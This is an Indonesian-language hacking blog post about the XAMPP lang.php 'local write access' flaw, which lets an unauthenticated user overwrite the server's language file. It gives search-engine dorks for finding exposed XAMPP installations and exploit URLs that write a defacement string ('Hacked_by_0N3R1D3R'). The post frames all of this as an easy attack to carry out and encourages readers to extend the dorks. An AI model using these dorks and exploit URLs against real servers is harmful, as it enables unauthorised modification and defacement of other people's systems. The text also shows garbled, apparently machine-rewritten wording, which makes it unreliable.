XAMPP ialah sebuah perangkat empuk open source yang mendukung tidak sedikit sistem operasi guna menjalankan suatu server dalam localhost. Dengan XAMPP, kita dapat menjalankan tidak sedikit program sekaligus dengan sekali klik laksana apache, mysql database, php dan perl.
Memang spektakuler program ini, namun dibalik semua tersebut XAMPP mempunyai sebuah kelemehan yakni pada file lang.php. Kelemahan ini terjadi sebab kita dapat mengirimkan suatu perintah tidak valid guna mengubah bahasa tanpa autentikasi. Tanpa terhubung kedalam jaringan lokal, kita dapat merubah file lang.tmp yang seharusnya memperlihatkan bahasa valid.
Itulah yang disebut xampp local write access. Teknik ini tergolong paling mudah, sebab kerjaannya bermukim exploit – exploit aja.
Dork:
inurl:/xampp/lang.php
inurl:/security/lang.php
Kembangin lagi gan.
Exploit:
/xampp/lang.php?Hacked_by_0N3R1D3R
/security/lang.php?Hacked_by_0N3R1D3R
Baca selengkapnya di XAMPP Local Write Access Vulnerability.